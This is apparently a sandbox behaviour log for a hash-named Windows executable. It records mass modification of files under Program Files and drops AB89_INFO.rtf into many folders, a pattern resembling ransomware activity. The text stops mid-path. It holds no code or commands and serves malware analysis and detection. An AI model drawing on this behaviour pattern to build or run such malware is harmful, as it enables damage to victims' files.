095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-autoupdate-services_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\UserControl.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\feature.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\jsse.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Krasnoyarsk 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.renderers.swt.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\be\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+8 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\AppConfig.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\UserControl.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qyzylorda 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\distribute_form.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\images\macHandle.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\security\cacerts 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\tr\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\EScript.api 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423861261279.profile.gz 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_diagonals-thick_18_b81900_40x40.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rcp.intro_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-ui.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-core_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.35.452\GoogleUpdateComRegisterShell64.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Javascripts\JSByteCodeWin.bin 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\db\lib\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\fonts\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\javafx.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\asl-v20.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Puerto_Rico 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Goose_Bay 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\cmm\LINEAR_RGB.pf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\etc\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.net_1.2.200.v20140124-2013.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bahia_Banderas 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jhat.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Yakutat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Gaza 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding_1.4.2.v20140729-1044.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaSansDemiBold.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pohnpei 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\COPYRIGHT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\StandardBusiness.pdf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Swift_Current 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Glace_Bay 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-openide-compat.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\GMT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\AppConfigurationInternal.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Galapagos 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Chisinau 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Yekaterinburg 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\fontconfig.bfc 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\LogoCanary.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Antarctica\Mawson 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Nome 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvmstat_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_winxp.css 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.eclipse.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\83.0.4103.106\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Indiana\Marengo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Chagos 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Guyana 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Antarctica\Palmer 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Windows Mail\wabmig.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\org-openide-util-lookup.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Indian\Mauritius 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Merida 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\AdobeID.pdf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\javax.servlet_3.0.0.v201112011016.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Tashkent 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\dblook 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\he.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Monterrey 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\CST6CDT 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt55.ths 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.ssl.feature_1.0.0.v20140827-1444\about.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\AddStart.asp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\nbexec.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\Flash.mpp 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Danmarkshavn 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\setNetworkClientCP.bat 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\skins\fonts\FreeSansBold.ttf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\el.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_GB_EURO.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.console.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\pt-PT.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\THANKS.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\Workflow.VisualBasic.Targets 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\my\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\com.jrockit.mc.feature.rcp_5.5.0.165303\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\am\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Creston 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\MDIParent.zip 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.event_1.3.100.v20140115-1647.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\common.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Miquelon 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\classlist 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\include\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jre7\bin\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Maceio 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\mailapi.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.mbeanbrowser.ja_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\bin\jvisualvm.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ui.sdk.scheduler.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\intf\telnet.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.docs.zh_CN_5.5.0.165303.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-lib-uihandler_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\launcher.exe 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\alt-rt.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-charts_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Swift_Current 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\MANIFEST.MF 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.bindings.nl_zh_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-heapdump_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Monrovia 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Baku 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\vlc.mo 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\default_apps\drive.crx 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\nl.pak 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files (x86)\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Informix.xsl 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Salta 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.feature_3.9.0.v20140827-1444\epl-v10.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Accra 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\te\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.win32.win32.x86_64_1.1.200.v20141007-2033\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\VideoLAN\VLC\locale\he\LC_MESSAGES\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-swing-plaf_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\Welcome.html 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\modules\simplexml.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\META-INF\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-attach_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\psfontj2d.properties 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Campo_Grande 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\AB89_INFO.rtf 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Dili 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\SetCheckpoint.txt 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\meta\art\03_lastfm.luac 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi.compatibility.state.nl_ja_4.4.0.v20140623020002.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.apache.batik.css_1.7.0.v201011041433.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-util-lookup_ja.jar 095721924420baff3670898412fc911ff32540544e8fad5495d334cded931270.bin.exe File opened for modification C:\Program 